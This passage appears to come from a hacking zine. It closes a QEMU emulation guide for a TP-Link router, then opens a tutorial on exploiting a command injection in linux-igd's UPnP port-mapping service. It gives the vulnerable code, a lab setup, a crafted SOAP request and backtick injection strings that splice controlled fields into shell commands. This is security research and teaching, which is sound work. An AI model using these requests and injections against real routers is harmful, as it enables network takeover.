        spi_io->cmd = ((spi_io->cmd & 0x0F) << 4 | (spi_io->cmd & 0xF0) >> 4
            | (spi_io->cmd & 0xF000) >> 4 | (spi_io->cmd & 0xF00) << 4 |
            (spi_io->cmd & 0xF0000) << 4 | (spi_io->cmd & 0xF00000) >> 4 |
            (spi_io->cmd & 0xF000000) << 4 | (spi_io->cmd & 0xF0000000) >> 4);
        if (spi_io->cmd == 0x9F) {
            spi_io->cmd = 0;
            return 0x1337;
        }
        break;
    default:
        break;
    }
    return 0;
}

static void spi_mmio_write(void *opaque, hwaddr addr,
                           uint64_t val, unsigned size)
{
    struct SPI_IO *spi_io = opaque;

    switch (addr) {
    case 0x0:
        break;
    case 0x8: // (SPI_IO_CONTROL_ADDR)
        if ((val == 0x70000) && (spi_io->cmd_in_progress == 0)) {
            // CS0-2 are high which means disabled
            // reset cmd offset and cmd
            spi_io->cmd_offset = 0;
            spi_io->cmd = 0;
            spi_io->cmd_in_progress = 1;
        }
        else if ((val == 0x70000) && (spi_io->cmd_in_progress == 1)) {
            spi_io->cmd_in_progress = 0;
            break;
        }
        if ((val & (1 << 8)) && (val & (1 << 18))) {
            // CS2 is low (active)
            // SPI_Clock is high, so grab data value
            if (spi_io->cmd_offset == 32) {
                break;
            }
            spi_io->cmd |= (val & 1) << spi_io->cmd_offset;
            spi_io->cmd_offset++;
        }
        break;
    default:
        break;
    }
    return;
}

static const MemoryRegionOps spi_mmio_ops = {
    .read = spi_mmio_read,
    .write = spi_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

// MMIO Callbacks for DDR
static uint64_t ddr_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    int base_addr = 0x18000000;
    int ret_val = 0;

    ret_val = read_mmio_mitm(base_addr + addr);
    return ret_val;
}

static void ddr_mmio_write(void *opaque, hwaddr addr,
                           uint64_t val, unsigned size)
{
    int base_addr = 0x18000000;

    write_mmio_mitm(base_addr + addr, val);
    return;
}

static const MemoryRegionOps ddr_mmio_ops = {
    .read = ddr_mmio_read,
    .write = ddr_mmio_write,
    .endianness = DEVICE_BIG_ENDIAN
};

struct fw_sections parse_wr940n_firmware_header(char *filename)
{
    struct fw_header fw_header;
    struct fw_sections fw_sections;
    FILE *fptr;

    memset(&fw_header, 0, sizeof(fw_header));
    memset(&fw_sections, 0, sizeof(fw_sections));
    fptr = fopen(filename, "rb");
    if (fptr == NULL) {
        /* Bail out early instead of calling fread() on a NULL stream */
        error_report("could not open firmware image '%s'", filename);
        exit(1);
    }
    fseek(fptr, 0, SEEK_SET);
    size_t read = fread(&fw_header, 1, sizeof(fw_header), fptr);
    if (read != sizeof(fw_header)) {
        printf("[-] Error while reading fw image %s\n", filename);
        printf("[-] Read size: %zu\n", read);
    }

    // We need to swap since we're on AyyMD64
    fw_header.version = bswap_32(fw_header.version);
    fw_header.hw_id = bswap_32(fw_header.hw_id);
    fw_header.hw_rev = bswap_32(fw_header.hw_rev);
    fw_header.kernel_la = bswap_32(fw_header.kernel_la);
    fw_header.kernel_ep = bswap_32(fw_header.kernel_ep);
    fw_header.fw_length = bswap_32(fw_header.fw_length);
    fw_header.kernel_ofs = bswap_32(fw_header.kernel_ofs);
    fw_header.kernel_len = bswap_32(fw_header.kernel_len);
    fw_header.rootfs_ofs = bswap_32(fw_header.rootfs_ofs);
    fw_header.rootfs_len = bswap_32(fw_header.rootfs_len);
    fw_header.boot_ofs = bswap_32(fw_header.boot_ofs);
    fw_header.boot_len = bswap_32(fw_header.boot_len);
    fw_header.ver_hi = bswap_16(fw_header.ver_hi);
    fw_header.ver_mid = bswap_16(fw_header.ver_mid);
    fw_header.ver_lo = bswap_16(fw_header.ver_lo);

    printf("[*] Vendor: %s\n", fw_header.vendor_name);
    printf("[*] FW Version: %s\n", fw_header.fw_version);
    printf("[*] fw_header.kernel_la: 0x%08x\n", fw_header.kernel_la);
    printf("[*] fw_header.kernel_ep: 0x%08x\n", fw_header.kernel_ep);
    printf("[*] fw_header.kernel_ofs: 0x%08x\n", fw_header.kernel_ofs);
    printf("[*] fw_header.kernel_len: 0x%08x\n", fw_header.kernel_len);
    printf("[*] fw_header.rootfs_ofs: 0x%08x\n", fw_header.rootfs_ofs);
    printf("[*] fw_header.rootfs_len: 0x%08x\n", fw_header.rootfs_len);
    printf("[*] fw_header.bootlen: 0x%08x\n", fw_header.boot_len);
    printf("[*] fw_header.boot_ofs: 0x%08x\n", fw_header.boot_ofs);
    printf("[*] fw_header.fw_length: 0x%08x\n", fw_header.fw_length);

    fw_sections.boot_loader_len = fw_header.fw_length - 0x200;
    fw_sections.bootloader = g_malloc(fw_sections.boot_loader_len + 1);
    read = fread(fw_sections.bootloader, 1, fw_sections.boot_loader_len,
                 fptr);
    if (read != fw_sections.boot_loader_len) {
        printf("[-] Error while reading from file: %s\n", filename);
    }
    fclose(fptr);
    return fw_sections;
}

static void
mips_wr940n_init(MachineState *machine)
{
    const char *kernel_filename = machine->kernel_filename;
    const char *kernel_cmdline = machine->kernel_cmdline;
    const char *initrd_filename = machine->initrd_filename;
    char *filename;
    MemoryRegion *address_space_mem = get_system_memory();
    MemoryRegion *gpio_mmio = g_new(MemoryRegion, 1);
    MemoryRegion *ddr_mmio = g_new(MemoryRegion, 1);
    /* bios, spi_mmio and isa are used below but were not declared */
    MemoryRegion *bios = g_new(MemoryRegion, 1);
    MemoryRegion *spi_mmio = g_new(MemoryRegion, 1);
    MemoryRegion *isa = g_new(MemoryRegion, 1);
    Clock *cpuclk;
    MIPSCPU *cpu;
    CPUMIPSState *env;
    ResetData *reset_info;
    struct fw_sections fw_sections;

    memset(&fw_sections, 0, sizeof(fw_sections));

    // Connect to MMIO Server
    connect_to_mmio_server();

    cpuclk = clock_new(OBJECT(machine), "cpu-refclk");
    clock_set_hz(cpuclk, 200 * 1000000); /* 200 MHz */

    /* Init CPUs. */
    cpu = mips_cpu_create_with_clock(machine->cpu_type, cpuclk);
    env = &cpu->env;

    reset_info = g_new0(ResetData, 1);
    reset_info->cpu = cpu;
    reset_info->vector = 0x9F000400;
    qemu_register_reset(main_cpu_reset, reset_info);

    /* Allocate RAM. */
    memory_region_add_subregion(address_space_mem, 0, machine->ram);

    /* bootloader */
    filename = qemu_find_file(QEMU_FILE_TYPE_BIOS, machine->firmware ?:
                              BIOS_FILENAME);
    if (filename) {
        fw_sections = parse_wr940n_firmware_header(filename);
        /* Map the BIOS / boot exception handler. */
        memory_region_init_rom(bios, NULL, "WR940NV6.bios.rom",
                               fw_sections.boot_loader_len, &error_fatal);
        memory_region_add_subregion_overlap(address_space_mem, 0x1F000000,
                                            bios, 0);
        rom_add_blob_fixed(filename, fw_sections.bootloader,
                           fw_sections.boot_loader_len, 0x1F000000);
        g_free(filename);
    }
    if (fw_sections.bootloader == 0) {
        /* we don't have a kernel image nor boot vector code.*/
        error_report("Could not load TP-Link FW Image bios '%s'",
                     machine->firmware);
        exit(1);
    } else {
        /* We have a boot vector start address. */
        env->active_tc.PC = (target_long)(int32_t)0x9F000400;
    }

    /* GPIO */
    memory_region_init_io(gpio_mmio, NULL, &gpio_mmio_ops, NULL,
                          "GPIO_MMIO", 0x74);
    memory_region_add_subregion(address_space_mem, 0x18040000LL,
                                gpio_mmio);

    /* SPI */
    struct SPI_IO *spi_io = g_malloc0(sizeof(struct SPI_IO));
    spi_io->spi_contents = g_malloc0(fw_sections.boot_loader_len+1);
    memcpy(spi_io->spi_contents, fw_sections.bootloader,
           fw_sections.boot_loader_len);
    memory_region_init_io(spi_mmio, NULL, &spi_mmio_ops, spi_io,
                          "SPI_MMIO", 0x20);
    memory_region_add_subregion_overlap(address_space_mem, 0x1F000000LL,
                                        spi_mmio, 1);

    /* DDR */
    memory_region_init_io(ddr_mmio, NULL, &ddr_mmio_ops, NULL,
                          "DDR_MMIO", 0x160);
    memory_region_add_subregion(address_space_mem, 0x18000000LL,
                                ddr_mmio);

    if (kernel_filename) {
        loaderparams.ram_size = machine->ram_size;
        loaderparams.kernel_filename = kernel_filename;
        loaderparams.kernel_cmdline = kernel_cmdline;
        loaderparams.initrd_filename = initrd_filename;
        reset_info->vector = load_kernel();
    }

    /* Init CPU internal devices. */
    cpu_mips_irq_init_cpu(cpu);
    cpu_mips_clock_init(cpu);

    memory_region_init_alias(isa, NULL, "isa_mmio",
                             get_system_io(), 0, 0x00010000);
    memory_region_add_subregion(get_system_memory(), 0x1fd00000,
                                isa);
}

static void mips_wr940n_machine_init(MachineClass *mc)
{
mc->desc = "TP-Link WR940NV6 Board by b1ack0wl";
mc->init = mips_wr940n_init;
mc->default_cpu_type = MIPS_CPU_TYPE_NAME("74Kf");
mc->default_ram_size = 1 * GiB; // for debug reasons
mc->default_ram_id = "mips_wr940n.ram";
}
DEFINE_MACHINE("WR940NV6", mips_wr940n_machine_init)
Header File (wr940n.h) * This needs to be put in the `qemu/include/hw/mips/` folder
#include <byteswap.h>
#include "hw/sysbus.h"
#include "chardev/char-fe.h"
struct fw_sections parse_wr940n_firmware_header(char *filename);
struct fw_sections{
char *bootloader;
int boot_loader_len;
char *kernel;
int kernel_len;
char *rootfs;
int root_fs_len;
};
/*
lifted from
https://github.com/jtreml/firmware-mod-kit/blob/master/src
/firmware-tools/mktplinkfw.c
*/
struct fw_header {
uint32_t version; /* header version */
char vendor_name[24];
char fw_version[36];
uint32_t hw_id; /* hardware id */
uint32_t hw_rev; /* hardware revision */
uint32_t unk1;
uint8_t md5sum1[16];
uint32_t unk2;
uint8_t md5sum2[16];
uint32_t unk3;
uint32_t kernel_la; /* kernel load address */
uint32_t kernel_ep; /* kernel entry point */
uint32_t fw_length; /* total length of the firmware */
uint32_t kernel_ofs; /* kernel data offset */
uint32_t kernel_len; /* kernel data length */
uint32_t rootfs_ofs; /* rootfs data offset */
uint32_t rootfs_len; /* rootfs data length */
uint32_t boot_ofs; /* bootloader data offset */
uint32_t boot_len; /* bootloader data length */
uint16_t ver_hi;
uint16_t ver_mid;
uint16_t ver_lo;
uint8_t pad[354];
};
struct SPI_IO {
/*< private >*/
SysBusDevice parent_obj;
/*< public >*/
MemoryRegion regs_region;
CharBackend chr;
char *spi_contents;
char model_number[5];
uint32_t read_offset;
uint32_t read_len;
uint8_t busy_flag;
uint32_t cmd;
uint8_t cmd_offset;
uint8_t cmd_in_progress;
};
Add this board to QEMU by modifying `qemu/hw/mips/meson.build` and adding the following statement:

`mips_ss.add(when: 'CONFIG_WR940N', if_true: files('0wl_wr940n_v6.c'))`

Then, go into `qemu/hw/mips/Kconfig` and add the following statements:
config WR940N
bool
select SERIAL
select MIPSNET
NOTE: The peripherals above are copied from MIPSSIM, but other included peripherals can be added if they can be utilized (e.g. Xilinx UART).

To run this board, just run the following command after building:

`./qemu-system-mips -s -machine WR940NV6 -bios WR940NV6_FW_FILE (e.g. wr940nv6_us_3_20_1_up_boot(220801).bin)`

The board will automatically extract the contents of the WR940Nv6 firmware blob, map the bootloader + kernel, and begin execution at Das U-Boot. You'll see the LED blink a few colors on the physical device and then the virtual board should crash due to an MMIO region not being allocated.

It is up to the reader to complete the rest of the MMIO peripherals while using the MITM technique, either to narrow in on a specific device (e.g. WiFi) or simply to see what's going on during the boot process or when a driver is interacting with it.

Happy Hacking :)

--[ References
/!\ AUTHOR_NOTE: If the above link 404s, go to the GPL code center
and look for WR940Nv6: https://www.tp-link.com/us/support/Sgpl-code/
|=-----------------------------------------------------------------------=|
|=--------------=[ 7 - Shell Your Way to Network Mastery ]=--------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Gabriel & Thomas ]=-------------------------=|
|=-----------------------------------------------------------------------=|

1 - Abstract
2 - Introduction
3 - White-box audit
4 - Compilation and debugging
5 - Becoming a Bash Jiu Jitsu white belt
6 - Becoming a Bash Jiu Jitsu purple belt
7 - Becoming a Bash Jiu Jitsu black belt
8 - Claiming supremacy over the mats
9 - Conclusion
10 - Acknowledgments
11 - References

---------------------------------------------------------------------------

--[ 1. Abstract

Control over LAN can be achieved by exploiting an old network service that opens a pathway through HTTP requests. By targeting a vulnerability in the service request's parsing of parameters, a patient attacker can force the execution of unauthorized commands as in a command line. This flow allows bypassing the built-in rulesets that would otherwise block such exploits, making it possible to gain deeper access. By carefully crafting unexpected HTTP requests while manipulating specific SOAP payloads, we can reach what we desire the most, the takeover of the network.

---------------------------------------------------------------------------

--[ 2. Introduction

Universal Plug and Play (UPnP) has long been a subject of concern due to its widespread use in simplifying network configurations, often at the expense of security. Originally designed to allow devices to automatically discover and configure themselves on a network, UPnP relies on the Internet Gateway Device (IGD), typically a router, to manage inbound and outbound traffic. However, the very features that make it convenient, such as automatic port forwarding and NAT traversal, also open doors to exploit.
Over time, Linux IGD implementations, which allow Linux-based systems to perform similar functions, have become increasingly relevant in the threat landscape. Despite being an old service, UPnP and its related components still present a range of vulnerabilities that attackers can exploit. The next section will explore how a modified version of linuxigd (linux-igd)[1] can be exploited.

---------------------------------------------------------------------------

--[ 3. White-box audit

The focus of this analysis is on the implementation of linuxigd (linux-igd) and its derivatives, such as the reuse of its codebase within SDKs. The original code can be found on SourceForge[2]. The service was written in C++ at first, but the developers switched to C starting with version 0.95.

+----------------------+----------+
| Version              | Language |
+----------------------+----------+
| gateway-0.71.tgz     | C++      |
| gateway-0.75.tgz     | C++      |
| gateway-0.90.tgz     | C++      |
| gateway-0.91.tgz     | C++      |
| linuxigd-0.92.tgz    | C++      |
| linuxigd-0.95.tar.gz | C        |
| linuxigd-1.0.tar.gz  | C        |
+----------------------+----------+

While each version and its changes have been analyzed, the vendor seems to have modified version 1.0 for its SDK. The code examples below are based on the vendor's modified source code of the latest version of linuxigd (1.0). It is up to the reader through firmware analysis to identify examples where this service codebase is reused in SDKs.

By reading the file pmlist.c source code, several command injections can be identified in the pmlist_AddPortMapping() and pmlist_DeletePortMapping() functions.
int pmlist_AddPortMapping(int enabled, char *protocol, char *externalPort,
char *internalClient, char *internalPort)
{
if (enabled)
{
...
char command[COMMAND_LEN];
int status;
{
...
snprintf(command, COMMAND_LEN, "%s -t nat -I %s -i %s -p %s"
" --dport %s -j DNAT --to %s:%s", g_vars.iptables,
g_vars.preroutingChainName, g_vars.extInterfaceName,
protocol, externalPort, internalClient, internalPort);
trace(3, "%s", command);
system(command);
...
}
if (g_vars.forwardRules)
{
snprintf(command, COMMAND_LEN, "%s -A %s -p %s"
" -d %s --dport %s -j ACCEPT", g_vars.iptables,
g_vars.forwardChainName, protocol, internalClient,
internalPort);
trace(3, "%s", command);
system(command);
...
}
...
}
return 1;
}
int pmlist_DeletePortMapping(int enabled, char *protocol,
char *externalPort, char *internalClient,
char *internalPort)
{
if (enabled)
{
...
char command[COMMAND_LEN];
int status;
{
...
snprintf(command, COMMAND_LEN, "%s -t nat -D %s -i %s -p %s"
" --dport %s -j DNAT --to %s:%s", g_vars.iptables,
g_vars.preroutingChainName, g_vars.extInterfaceName,
protocol, externalPort, internalClient, internalPort);
trace(3, "%s", command);
system(command);
...
}
if (g_vars.forwardRules)
{
snprintf(command, COMMAND_LEN, "%s -D %s -p %s"
" -d %s --dport %s -j ACCEPT", g_vars.iptables,
g_vars.forwardChainName, protocol, internalClient,
internalPort);
trace(3, "%s", command);
system(command);
...
}
...
}
return 1;
}
Building the command string from elements controlled by an attacker and then passing it to the system() function raises a security issue: any shell metacharacter in those elements is interpreted by the shell. The pmlist_AddPortMapping() function is called by the pmlist_PushBack() function within the pmlist.c file.
int pmlist_PushBack(struct portMap* item)
{
int action_succeeded = 0;
...
if (action_succeeded == 1)
{
pmlist_AddPortMapping(item->m_PortMappingEnabled,
item->m_PortMappingProtocol,
item->m_ExternalPort, item->m_InternalClient,
item->m_InternalPort);
return 1;
}
else
return 0;
}
By analyzing the code above, it appears that the values supplied to the pmlist_AddPortMapping() function are not sanitized at this point. Any validation has to happen earlier in the call stack, when the portMap structure is created and before it is supplied to the pmlist_PushBack() function. This can be observed in the gatedevice.c file, where the AddPortMapping() function is defined. This function is called by the SOAP action handler HandleActionRequest(), which is registered by EventHandler() to process the associated HTTP request.
int AddPortMapping(struct Upnp_Action_Request *ca_event)
{
char *remote_host = NULL;
char *ext_port = NULL;
char *proto = NULL;
char *int_port = NULL;
char *int_ip = NULL;
char *int_duration = NULL;
char *bool_enabled = NULL;
char *desc = NULL;
struct portMap *ret, *new;
int result;
char num[5]; // Maximum number of port mapping entries 9999
IXML_Document *propSet = NULL;
int action_succeeded = 0;
char resultStr[RESULT_LEN];
if (
(ext_port = GetFirstDocumentItem(ca_event->ActionRequest,
"NewExternalPort")) &&
(proto = GetFirstDocumentItem(ca_event->ActionRequest,
"NewProtocol")) &&
(int_port = GetFirstDocumentItem(ca_event->ActionRequest,
"NewInternalPort")) &&
(int_ip = GetFirstDocumentItem(ca_event->ActionRequest,
"NewInternalClient")) &&
(int_duration = GetFirstDocumentItem(ca_event->ActionRequest,
"NewLeaseDuration")) &&
(bool_enabled = GetFirstDocumentItem(ca_event->ActionRequest,
"NewEnabled")) &&
(desc = GetFirstDocumentItem(ca_event->ActionRequest,
"NewPortMappingDescription")))
{
remote_host = GetFirstDocumentItem(ca_event->ActionRequest,
"NewRemoteHost");
...
if ((ret = pmlist_Find(ext_port, proto, int_ip)) != NULL)
{
trace(3, "Found port map to already exist. Replacing");
pmlist_Delete(ret);
}
new = pmlist_NewNode(atoi(bool_enabled), atol(int_duration), "",
ext_port, int_port, proto, int_ip, desc);
result = pmlist_PushBack(new);
...
}
...
}
The pmlist_NewNode() function, defined in the pmlist.c file, performs checks on the values contained in the SOAP request, but only on their length. To clarify the information presented so far, the diagram below summarizes the call stack as neatly as possible.

              +------------------+
              |      main()      |
              +------------------+
                       |
                       v
           +------------------------+
           |     EventHandler()     |
           +------------------------+
                       |
                       v
          +---------------------------+
          |   HandleActionRequest()   |
          +---------------------------+
                       |
                       v
          +--------------------------+
          |     AddPortMapping()     |
          +--------------------------+
               /              \
              v                v
+------------------+  +---------------------+
| pmlist_NewNode() |  |  pmlist_PushBack()  |<---+
+------------------+  +---------------------+    |
         |                       |               |
         |                       |               |
         +----struct portMap-----|---------------+
                                 |
                                 v
                    +-------------------------+
                    | pmlist_AddPortMapping() |
                    +-------------------------+
                                 |
                                 v
                          +------------+
                          |  system()  |
                          +------------+
struct portMap* pmlist_NewNode(int enabled, long int duration,
char *remoteHost, char *externalPort,
char *internalPort, char *protocol,
char *internalClient, char *desc)
{
struct portMap* temp = (struct portMap*) malloc(
sizeof(struct portMap)
);
temp->m_PortMappingEnabled = enabled;
if (remoteHost && strlen(remoteHost) < sizeof(temp->m_RemoteHost))
strcpy(temp->m_RemoteHost, remoteHost);
else
strcpy(temp->m_RemoteHost, "");
if (strlen(externalPort) < sizeof(temp->m_ExternalPort))
strcpy(temp->m_ExternalPort, externalPort);
else
strcpy(temp->m_ExternalPort, "");
if (strlen(internalPort) < sizeof(temp->m_InternalPort))
strcpy(temp->m_InternalPort, internalPort);
else
strcpy(temp->m_InternalPort, "");
if (strlen(protocol) < sizeof(temp->m_PortMappingProtocol))
strcpy(temp->m_PortMappingProtocol, protocol);
else
strcpy(temp->m_PortMappingProtocol, "");
if (strlen(internalClient) < sizeof(temp->m_InternalClient))
strcpy(temp->m_InternalClient, internalClient);
else
strcpy(temp->m_InternalClient, "");
if (strlen(desc) < sizeof(temp->m_PortMappingDescription))
strcpy(temp->m_PortMappingDescription, desc);
else
strcpy(temp->m_PortMappingDescription, "");
temp->m_PortMappingLeaseDuration = duration;
temp->next = NULL;
temp->prev = NULL;
return temp;
}
To identify the length of each structure field, it is sufficient to read its definition in the pmlist.h file.
struct portMap
{
int m_PortMappingEnabled;
long int m_PortMappingLeaseDuration;
char m_RemoteHost[16];
char m_ExternalPort[6];
char m_InternalPort[6];
char m_PortMappingProtocol[4];
char m_InternalClient[16];
char m_PortMappingDescription[50];
int expirationEventId;
long int expirationTime;
struct portMap* next;
struct portMap* prev;
} *pmlist_Head, *pmlist_Tail, *pmlist_Current;
The definition of the above structure highlights that, regardless of the circumstances, the attacker is limited in the number of characters he can inject into the various fields of the SOAP request, thereby restricting the commands he can use to exploit the command injection.

---------------------------------------------------------------------------

--[ 4. Compilation and debugging

To study the service's behavior during execution, it is highly recommended to compile it from source and debug it to streamline the development phase of the exploit.

The compilation phase was likely the most troublesome. As the service's source code was quite outdated, it took numerous tests and failures before a solution was found. The solution was to compile and run the service in a virtual machine (x86_64) using QEMU, with Fedora 21 selected as the guest operating system.

It is not necessary to allocate much storage space, as this machine will only run the sshd service (for administration) and the targeted service. A disk can be created with the following command.

  $ qemu-img create -f qcow2 fedora21.qcow2 20G

Once the disk is created, the next step is to launch QEMU, specifying the path to the ISO (the download link is provided in the references section[3]), and perform a standard Fedora 21 installation.

  $ qemu-system-x86_64 \
      -m 4G \
      -smp 4 \
      -cdrom Fedora-Live-Workstation-x86_64-21-5.iso \
      -drive file=fedora21.qcow2,format=qcow2 \
      -boot d \
      -net nic \
      -net user \
      -vga std \
      -display default

Once the operating system is installed on the guest machine, the VM can be powered off and then restarted using the command below.

  $ qemu-system-x86_64 \
      -m 4G -smp 4 \
      -drive file=fedora21.qcow2,format=qcow2 \
      -net nic \
      -net user,hostfwd=tcp::2222-:22 \
      -vga std \
      -display default

The libupnp[4] library must be compiled before linux-igd, because linux-igd depends on it to implement the UPnP Internet Gateway Device (IGD) protocol.
Since linux-igd links against libupnp during compilation, failing to compile libupnp first will result in build errors due to missing headers and libraries. According to the linux-igd installation file INSTALL, we must first compile version 1.3.1[5] of the libupnp library.

  $ tar -xf libupnp-1.3.1.tar.gz
  $ cd libupnp-1.3.1/
  $ ./configure
  $ make -j4
  $ sudo make install

The targeted service can then be compiled.

  $ tar -xf linuxigd-1.0.tar.gz
  $ cd linuxigd-1.0/
  $ make -j4
  $ sudo make install

Following the installation of linux-igd, the following files have been added to the system.

  /etc/
  |__ linuxigd/
  |   |__ dummy.xml
  |   |__ gateconnSCPD.xml
  |   |__ gatedesc.xml
  |   |__ gateicfgSCPD.xml
  |__ upnpd.conf

To have a functional service that simulates a real network device, our virtual machine needs two interfaces:

  - WAN interface (created as a dummy interface)
  - LAN interface (the one we are connected to via SSH).

  $ sudo ip link add name dummy0 type dummy
  $ sudo ip link set dummy0 up
  $ sudo ip addr add 192.168.13.37/24 dev dummy0

To verify that the interface has been correctly created and configured, use the following command.

  $ ip addr show dummy0

Once the tests are complete, it can be deleted using the following command.

  $ sudo ip link delete dummy0

To set up debugging, use GDB to place a breakpoint on the system() function call. But first, set the debug_mode value in the file /etc/upnpd.conf as follows (to improve debugging).

  # Daemon debug level. Messages are logged via syslog to debug.
  # 0 - no debug messages
  # 1 - log errors
  # 2 - log errors and basic info
  # 3 - log errors and verbose info
  # default = 0
  debug_mode = 3

The service can then be started using the following command.

  $ sudo LD_LIBRARY_PATH=/usr/local/lib upnpd -f dummy0 ens3

To debug with GDB, simply retrieve the PID of the process associated with the service.
  $ ps auxf|grep upnpd
  $ gdb -p <PID>
  (gdb) break system
  (gdb) c

Now that the service is up and running and the debugging setup is complete, the next step is to interact with it. To do this, we need to review the contents of the gatedesc.xml and gateconnSCPD.xml files, which are located in /etc/linuxigd/.

Although we were not always fans of AI, we have come to realize that, as the saying goes, "Only fools do not change their minds!" With that in mind, it might be worthwhile to use a Large Language Model (LLM) based on the GPT-4 architecture to parse the XML files and generate the necessary HTTP requests for interacting with the service. This approach is especially useful when working with a service that has been enhanced with new features (but still based on linux-igd within the SDK).

For instance, ChatGPT was able to provide the HTTP request needed to reach the vulnerable function pmlist_AddPortMapping().
POST /upnp/control/WANIPConn1 HTTP/1.1
Host: 127.0.0.1:49152
Content-Type: text/xml; charset="utf-8"
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
Content-Length: 704
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:urn="urn:schemas-upnp-org:service:WANIPConnection:1">
<soapenv:Header/>
<soapenv:Body>
<urn:AddPortMapping>
<NewRemoteHost></NewRemoteHost>
<NewEnabled>1</NewEnabled>
<NewLeaseDuration>1</NewLeaseDuration>
<NewPortMappingDescription>POC</NewPortMappingDescription>
<NewProtocol>AAA</NewProtocol>
<NewExternalPort>BBBBB</NewExternalPort>
<NewInternalClient>CCCCCCCCCCCCCCC</NewInternalClient>
<NewInternalPort>DDDDD</NewInternalPort>
</urn:AddPortMapping>
</soapenv:Body>
</soapenv:Envelope>
Once the request is sent using curl, the following behavior can be monitored.

  $ curl -v \
      -d @body.soap \
      -H 'Content-Type: text/xml; charset="utf-8"' \
      -H 'SOAPAction: "...IPConnection:1#AddPortMapping"' \
      'http://127.0.0.1:49152/upnp/control/WANIPConn1'

  $ sudo LD_LIBRARY_PATH=/usr/local/lib upnpd -f dummy0 ens3
  upnpd[1878]: Initializing UPnP SDK ...
  upnpd[1878]: UPnP SDK Successfully Initialized.
  upnpd[1878]: Setting the Web Server Root Directory to /etc/linuxigd
  upnpd[1878]: Succesfully set the Web Server Root Directory.
  upnpd[1878]: Registering the root device with descDocUrl
               http://10.0.2.15:49152/gatedesc.xml
  upnpd[1878]: IGD root device successfully registered.
  upnpd[1878]: Advertisements Sent. Listening for requests ...
  upnpd[1878]: ActionName = AddPortMapping
  upnpd[1878]: appended 1 AAA BBBBB CCCCCCCCCCCCCCC DDDDD 1
  upnpd[1878]: /sbin/iptables -t nat -I PREROUTING -i dummy0 -p AAA
               --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
  upnpd[1878]: /sbin/iptables -A FORWARD -p AAA -d CCCCCCCCCCCCCCC
               --dport DDDDD -j ACCEPT
  upnpd[1878]: ScheduleMappingExpiration: DevUDN:
               uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX ServiceID:
               urn:upnp-org:serviceId:WANIPConn1 Proto: AAA ExtPort: BBBBB
               Int: CCCCCCCCCCCCCCC.DDDDD at: Mon Jan 1 00:00:00 1970
               eventId: 0
  upnpd[1878]: PortMappingNumberOfEntries: 1
  upnpd[1878]: AddPortMap: DevUDN:
               uuid:XXXXXXXX-XXXX-XXXX-8e6c-XXXXXXXXXXXX ServiceID:
               urn:upnp-org:serviceId:WANIPConn1 RemoteHost: (null)
               Prot: AAA ExtPort: BBBBB Int: CCCCCCCCCCCCCCC.DDDDD
  upnpd[1878]: ExpireMapping: Proto:AAA Port:BBBBB
  upnpd[1878]: /sbin/iptables -t nat -D PREROUTING -i dummy0 -p AAA
               --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
  upnpd[1878]: [HIT 3] /sbin/iptables -D FORWARD -p AAA -d CCCCCCCCCCCCCCC
               --dport DDDDD -j ACCEPT
  upnpd[1878]: ExpireMapping: UpnpNotifyExt(deviceHandle,
               uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX,
               urn:upnp-org:serviceId:WANIPConn1,propSet)
               PortMappingNumberOfEntries: 0

Please note that after the HTTP request was sent, four system commands were executed. For clarity, we will summarize them as follows, with the portions before the first injection point replaced by "U".

  $ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
  $ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT
  $ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
  $ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT

It is evident that commands one and three are identical, as are commands two and four. To summarize, here are the commands that were executed once the request was processed by the service.

  $ U AAA --dport BBBBB -j DNAT --to CCCCCCCCCCCCCCC:DDDDD
  $ U AAA -d CCCCCCCCCCCCCCC --dport DDDDD -j ACCEPT

Now, the fun begins!

---------------------------------------------------------------------------

--[ 5. Becoming a Bash Jiu Jitsu white belt

Currently, it is possible to inject ourselves into two different commands at several locations within these commands. However, we must overcome two problems.

  1. We control exactly 28 characters ("AAA", "BBBBB", "CCCCCCCCCCCCCCC", "DDDDD") in the first command and 23 in the second.
  2. Our injection points are discontinuous and there are elements (command options) between our different injection points.

The backtick or backquote (`) in shell scripting is used for command substitution, where the shell executes the command inside the backticks and replaces the backtick expression with the output of the command. It is supported by many Unix-like shells, including sh (Bourne Shell), bash (Bourne Again Shell), ash (Almquist Shell) and dash (Debian Almquist Shell).

+-------+----------------+------------------------------------------------+
| Shell | "`" Supported? | Version(s) Supporting Backquotes               |
+-------+----------------+------------------------------------------------+
| sh    | Yes            | All versions (all modern POSIX-compliant)      |
| bash  | Yes            | All versions (from 1.0 in 1989 to present)     |
| ash   | Yes            | All versions (since 1989, including BusyBox)   |
| dash  | Yes            | All versions (since 2001)                      |
+-------+----------------+------------------------------------------------+

We will use this feature to remove the parts we don't need: wrapping them in backquotes makes the shell run them as commands and, since these commands produce no output on stdout, substitute nothing in their place, which concatenates our various injection points.

  $ U ;A` --dport `BBB` -j DNAT --to `CCCCCCCCCCCCC`:`DDDD
  ...
  sh: --dport: command not found
  sh: -j: command not found
  sh: ABBBCCCCCCCCCCCCCDDDD: command not found

  $ U ;A` -d `CCCCCCCCCCCCC` --dport `DDDD -j ACCEPT
  ...
  sh: -d: command not found
  sh: --dport: command not found
  sh: ACCCCCCCCCCCCCDDDD: command not found

We observe that the command ABBBCCCCCCCCCCCCCDDDD (length 21) is executed, as well as the ACCCCCCCCCCCCCDDDD (length 18) command.

You might say that using 21 characters (or 18) to exploit a command injection is simple enough to do with minimal effort. So let's make things a little more complex.

---------------------------------------------------------------------------

--[ 6. Becoming a Bash Jiu Jitsu purple belt

Some of the variants of linuxigd (linux-igd) you may come across might implement security checks on specific values. For example, some of the most up-to-date variants check the values of the XML nodes NewExternalPort and NewInternalPort with the function atoi(). You may encounter code snippets like the one below.
